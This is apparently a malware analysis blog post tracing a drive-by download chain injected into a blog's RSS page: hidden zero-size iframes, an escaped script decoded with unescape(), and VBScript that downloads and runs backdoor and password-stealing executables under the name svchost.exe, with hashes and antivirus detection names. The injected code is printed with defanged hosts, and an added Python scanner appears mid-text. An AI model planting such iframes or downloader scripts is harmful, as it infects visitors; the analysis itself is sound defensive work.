Endurer Original
Version 3: Added Rising's response
Version 2: Added Kaspersky's response
Version 1
This blog's rss2.asp contains the code:
/---
<SCRIPT> var words = "% * 3 * CHT * ml % 3E % 3 ciframe SRC % 3d % 22 hxxp % 3A % 2f % 2 fkmx % 2e ** ZL ** F * j ** J % 2 ECOM % 2 findex % 2 ehtm % 22 name % 3d % 22zhu % 22 width % 3d % 220% 22 height % 3d % 220% 22 frameborder % 3d % 220% 22% 3E % 3C % 2 fhtml % 3E % 0d % 0a % 0d % 0a % 0d % 0a "; document. write (words SCAPE (words) </SCRIPT> <IFRAME src = "hxxp: // zhang8 ** 5*9 **. g ** o * 1 *** .icpcn.com/index.htm "width =" 0 "Height =" 0 "scrolling =" no "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // zhang8 ** 5*9 **. g ** o * 1 *** .icpcn.com/ndex.htm "width =" 0 "Height =" 0 "scrolling =" no "frameborder =" 0 "> </iframe> <IFRAME src = "hxxp: // zhang8 ** 5*9 **. g ** o * 1 *** .icpcn.com/index.htm "width =" 0 "Height =" 0 "scrolling =" no "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // zhang8 ** 5*9 **. g ** o * 1 *** .icpcn.com/ndex.htm "width =" 0 "Height =" 0 "scrolling =" no "frameborder =" 0 "> </iframe>
---/
The decrypted value of the variable words is as follows:
/---
<HTML> <IFRAME src = "hxxp: // K *** M *** x *. Z *** l ** F *** J * j.com/index.htm "name =" zhu "width =" 0 "Height =" 0 "frameborder =" 0 ">
---/
hxxp://K***M***.Z***l***F***J*j.com/index.htm contains the code:
/---
<IFRAME src = "hxxp: // www. M ** H ** 5 ** 5 **. CN/g ***** Z ****. htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // K *** M *** x *. Z *** l ** F *** J * j.com/jb.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // www. Z *** l ** F *** J * j.com/321.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // www. Z *** l ** F *** J * j.com/123.htm "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/
hxxp://www.M**H**5**5**.CN/g*****Z****.htm: the script code in this page uses unescape() to decode a string value and output it.
The output is a VBScript script. It uses a custom function:
/---
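' Decoder used by the malicious page: each comma-separated item is
' evaluated and converted to one character.
Function rechange(k)
    s = Split(k, ",")
    t = ""
    For i = 0 To UBound(s)
        t = t + Chr(Eval(s(i)))
    Next
    rechange = t
End Function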
---/
to decrypt the value of variable t and execute it.
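The two decoding layers described so far (the unescape() string written into the feed, and rechange()) can be reproduced statically, without letting the scripts run. The Python below is an added example, not code from the analysed pages: the names `scan`, `hidden_iframes` and `SAMPLE_FEED` and the example.test hosts are constructed, and it assumes each rechange() item is plain decimal arithmetic.

```python
import ast
import operator
import re
from urllib.parse import unquote

# Constructed sample feed: one escaped layer, one plain hidden frame, one visible frame.
SAMPLE_FEED = (
    '<script>var words="%3Chtml%3E%3Ciframe src%3d%22hxxp%3A%2f%2fa.example.test%2findex.htm%22 '
    'width%3d%220%22 height%3d%220%22%3E%3C%2fhtml%3E";document.write(unescape(words))</script>'
    '<iframe src="hxxp://b.example.test/index.htm" width="0" height="0"></iframe>'
    '<iframe src="hxxp://c.example.test/player.htm" width="480" height="270"></iframe>'
)

# The sample's rechange() hands every item to Eval(); an analysis tool must not.
# Only integer +, - and * are accepted here (assumption about the item syntax).
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}

def _arith(node):
    if isinstance(node, ast.Constant) and type(node.value) is int:
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
        return _OPS[type(node.op)](_arith(node.left), _arith(node.right))
    raise ValueError("non-arithmetic item refused")

def rechange(k):
    """Static equivalent of the VBScript rechange(): one character per item."""
    return "".join(chr(_arith(ast.parse(item.strip(), mode="eval").body))
                   for item in k.split(","))

IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR = re.compile(r"""(\w+)\s*=\s*["']?([^"'\s>]*)""")

def hidden_iframes(markup):
    """Return the src of every iframe whose width and height are both 0."""
    found = []
    for tag in IFRAME.findall(markup):
        attrs = {name.lower(): value for name, value in ATTR.findall(tag)}
        if attrs.get("width") == "0" and attrs.get("height") == "0":
            found.append(attrs.get("src", ""))
    return found

def scan(markup):
    """Check the markup itself, then the percent-decoded form of each string literal."""
    literals = re.findall(r'var\s+\w+\s*=\s*"([^"]*)"', markup)
    layers = [markup] + [unquote(text) for text in literals]
    return [src for layer in layers for src in hidden_iframes(layer)]
```

`unquote` covers the `%XX` escapes seen in this sample; JavaScript's unescape() also accepts `%uXXXX`, which would need separate handling.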
The decrypted value of variable t is VBScript code. It uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file gz.exe, save it as %Temp%/leren.BAT, and run it with the ShellExecute method of the Shell.Application object Q.
File description: D:/test/gz.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:41:59
Modification time: 12:41:59
Access time:
Size: 387584 bytes, 378.512 KB
MD5: 8b1e57e69f958e004fc743188e4f63c4
Kaspersky reports Backdoor.Win32.Hupigon.emk [KLAB-1900585]
Rising reports Backdoor.Gpigeon.sbi (virus report email analysis result, ticket No.: 6239851)
We will solve this problem in the newer version 19.16.42 (version 18.72.42 of Rising Star 2006). Please upgrade your Rising Star software to version 19.16.42 (version 18.72.42 of Rising Star 2006) and enable the monitoring center to completely eliminate viruses. If a problem is found during the test, we will postpone the upgrade from version 1 to version 2.
hxxp://K***M***x*.Z***l***F***J*j.com/jb.htm (Kaspersky reports: Trojan-Downloader.VBS.Small.dc): the content is VBScript code. It outputs the message "Hello, the page you are visiting is loading... please wait....", then uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file jb.exe, save it as %Temp%/svchost.exe, and run it with the ShellExecute method of the Shell.Application object zhonghuae.
File description: D:/test/jb.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:39:38
Modification time: 12:39:40
Access time:
Size: 5632 bytes, 5.512 KB
MD5: ee5a215b736b733ec2caed16fb413a29
Kaspersky reports Trojan.Win32.Agent.aic [KLAB-1900058]
Rising reports Trojan.Mnless.hpg (virus report email analysis result, ticket No.: 6239566)
hxxp://www.Z***L*f***J*j.com/321.htm: the content is VBScript code. It outputs the message "Hello, the page you are visiting is loading... please wait....", then uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file 321.exe, save it as %Temp%/svchost.exe, and run it with the ShellExecute method of the Shell.Application object zhonghuae.
File description: D:/test/321.exe
Attribute: ---
Language: English (USA)
File version: 5.2.20.0.1830
Description: generic host process for Win32 services
Copyright: (c) Microsoft Corporation. All rights reserved.
Note:
Product Version: 5.2.20.0.1830
Product Name: Microsoft (r) Windows (r) Operating System
Company Name: Microsoft Corporation
Legal trademark:
Internal name: rpcs.exe
Source File Name: rpcs.exe
Creation Time: 12:39:38
Modification time: 12:41:12
Access time:
Size: 109606 bytes, 107.38 KB
MD5: 9adeac121907c9ea7ad2b1dad7834bc6
Kaspersky reports Trojan-PSW.Win32.QQRob.km
Rising reports Trojan.PSW.QQRobber.bkv (virus report email analysis result, ticket No.: 6239566)
hxxp://www.Z***L*f***J*j.com/123.htm: the content is VBScript code. It outputs the message "Hello, the page you are visiting is loading... please wait....", then uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file 123.exe, save it as %Temp%/svchost.exe, and run it with the ShellExecute method of the Shell.Application object zhonghuae.
File description: D:/test/123.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:39:38
Modification time: 12:43:34
Access time:
Size: 298121 bytes, 291.137 KB
MD5: b6b5bd850c28a1843fc5195fa09d52c7
Kaspersky reports Backdoor.Win32.Hupigon.crx [KLAB-1900585]
Rising reports Trojan.Mnless.hpf (virus report email analysis result, ticket No.: 6239566)
hxxp://zhang8**5*9**.g**o**1***.icpcn.com/index.htm (Rising reports: Trojan.DL.VBS.Agent.clg): the content is JavaScript code. It uses String.fromCharCode() to decode the value of variable t and output it.
The decoded value of variable t is VBScript code. It uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file 010.exe, save it as %Temp%/svchost.exe, and run it with the ShellExecute method of the Shell.Application object Xe.
File description: D:/test/010.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 413184 bytes, 403.512 KB
MD5: 8181fd58e26227d57915fa25ce26234e
Kaspersky reports Backdoor.Win32.Hupigon.avg [KLAB-1900585]
Rising reports Backdoor.Gpigeon.sbg (virus report email analysis result, ticket No.: 6239423)